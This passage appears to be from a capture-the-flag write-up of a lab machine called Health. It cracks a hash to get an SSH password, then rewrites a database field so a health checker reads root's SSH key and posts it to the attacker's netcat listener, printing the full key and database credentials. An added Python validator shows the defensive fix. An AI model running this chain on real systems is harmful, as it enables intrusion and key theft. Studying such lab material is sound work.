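The emitted line is identical to the one in the terminal above except for the `==` that completes the salt's base64. `verify_candidate` is deliberately a single-candidate check (10000 PBKDF2 rounds per call), the same cost that makes the format resistant to brute force from the defender's side; bulk guessing is what hashcat is for.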
With this format we can easily crack it with hashcat and rockyou.txt.
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt --show
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=:february15
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─#
february15
We can connect over SSH as user susanne with that password.
ssh susanne@10.129.179.184
3. Privilege Escalation
https://github.com/DominicBreuker/pspy
2022/12/22 14:34:01 CMD: UID=0 PID=3707 | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
2022/12/22 14:34:01 CMD: UID=0 PID=3710 | grep columns
2022/12/22 14:34:01 CMD: UID=0 PID=3708 | sh -c stty -a | grep columns
2022/12/22 14:34:01 CMD: UID=0 PID=3711 | sh -c stty -a | grep columns
2022/12/22 14:34:01 CMD: UID=0 PID=3713 | grep columns
2022/12/22 14:34:06 CMD: UID=0 PID=3716 | mysql laravel --execute TRUNCATE tasks
So, in principle, we can create a new task and then update that task's row in the database so that the checker loads a local file, e.g. /root/.ssh/id_rsa.
Furthermore, in the web application's files we find that the checker sends whatever it reads from monitoredUrl to the webhook, and we have credentials to change that value in MySQL:
susanne@health:/var/www/html/app/Http/Controllers$ cat HealthChecker.php | grep file -A8 -B4
        $json = [];
        $json['webhookUrl'] = $webhookUrl;
        $json['monitoredUrl'] = $monitoredUrl;
        $res = @file_get_contents($monitoredUrl, false);
        if ($res) {
            if ($onlyError) {
                return $json;
            }
            $json['health'] = "up";
            $json['body'] = $res;
susanne@health:/var/www/html/app/Http/Controllers$
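Both tricks in this write-up land on the same line: `file_get_contents($monitoredUrl)` fetches whatever URL is in the database, honouring `file://` and following redirects. The following Python is an added example of the validation that controller lacks; it is not code from the Health box or its Laravel app, and it is written in Python rather than PHP to match the page's own tooling. The resolver is injectable so the demo runs offline; the hostnames and addresses in the fake resolver are constructed.

```python
#!/usr/bin/env python3
"""Validate a monitored URL before a health checker fetches it.

Added example, not part of the original write-up. Rejects the two things
seen above: a file:// URL written into the tasks table, and a 302 that
bounces the fetcher onto 127.0.0.1:3000. Every redirect hop is re-validated
as if it were user input.
"""
import ipaddress
import socket
from typing import Callable, Set, Tuple
from urllib.parse import urlsplit, urljoin

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3

Resolver = Callable[[str], Set[str]]


def default_resolver(host: str) -> Set[str]:
    """System resolver; returns every address the name maps to (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed lookup table so the demo runs without DNS.
FAKE_DNS = {
    "status.example.com": {"93.184.216.34"},   # constructed: a public address
    "localtest.example.com": {"127.0.0.1"},     # constructed: name that resolves to loopback
}


def fake_resolver(host: str) -> Set[str]:
    try:
        ipaddress.ip_address(host)  # literal IP: resolves to itself
        return {host}
    except ValueError:
        pass
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    raise socket.gaierror(f"constructed resolver has no entry for {host}")


def validate_url(url: str, resolver: Resolver = default_resolver) -> Tuple[bool, str]:
    """Return (ok, reason). Only http/https, no userinfo, and every address the
    host resolves to must be globally routable (no loopback, RFC 1918,
    link-local, or other reserved space)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "userinfo in URL not allowed"
    try:
        addrs = resolver(parts.hostname)
    except (socket.gaierror, OSError) as exc:
        return False, f"resolution failed: {exc}"
    if not addrs:
        return False, "host resolved to no addresses"
    for a in addrs:
        try:
            ip = ipaddress.ip_address(a)
        except ValueError:
            return False, f"unparseable address {a!r}"
        if not ip.is_global:
            return False, f"{parts.hostname} resolves to non-global address {a}"
    return True, "ok"


def follow_redirect(current: str, location: str, hops: int,
                    resolver: Resolver = default_resolver) -> Tuple[bool, str, str]:
    """Resolve a Location header against the current URL and validate the
    result like any other input. Returns (ok, next_url, reason)."""
    if hops >= MAX_REDIRECTS:
        return False, "", "too many redirects"
    nxt = urljoin(current, location)
    ok, reason = validate_url(nxt, resolver)
    return ok, (nxt if ok else ""), reason


if __name__ == "__main__":
    for u in ("http://status.example.com/health", "file:///root/.ssh/id_rsa",
              "http://127.0.0.1:3000/", "http://localtest.example.com/"):
        print(u, validate_url(u, fake_resolver))
    # The write-up's relay: an allowed host answering 302 Location: localhost.
    print(follow_redirect("http://status.example.com/", "http://127.0.0.1:3000/",
                          0, fake_resolver))
```

Note that with this policy the lab attacker address 10.10.14.64 is rejected too, since 10/8 is private; in a real deployment the monitored targets are public, and the checker should additionally fetch with redirects disabled in the HTTP client and call `follow_redirect` itself for each hop, otherwise the validated address and the address actually connected to can still differ (DNS rebinding between check and fetch).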
Start a listener locally:
nc -nvlp 80
We define a new webhook pointing to our host, this time creating it through the application.
Then we connect to MySQL and change the value of monitoredUrl to root's id_rsa.
susanne@health:/var/www/html/app/Http/Controllers$ mysql -Dlaravel -ularavel -pMYsql_strongestpass@2014+
mysql: [Warning] Using a password on the command line interface can be insecure.
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 168
Server version: 5.7.39-0ubuntu0.18.04.2 (Ubuntu)
Copyright (c) 2000, 2022, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> update tasks set monitoredUrl='file:///root/.ssh/id_rsa';
Query OK, 0 rows affected (0.00 sec)
Rows matched: 0 Changed: 0 Warnings: 0
mysql>
After waiting a few seconds, we receive the id_rsa data on the netcat listener.
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 45022
POST / HTTP/1.1
Host: 10.10.14.64
Accept: */*
Content-type: application/json
Content-Length: 1829
Expect: 100-continue
{"webhookUrl":"http:\/\/10.10.14.64\/","monitoredUrl":"file:\/\/\/root\/.ssh\/id_rsa","health":"up","body":"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"}
Turning each \n into a real newline and removing the backslashes, we are left with root's id_rsa.
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
ssh root@10.129.179.184 -i id_rsa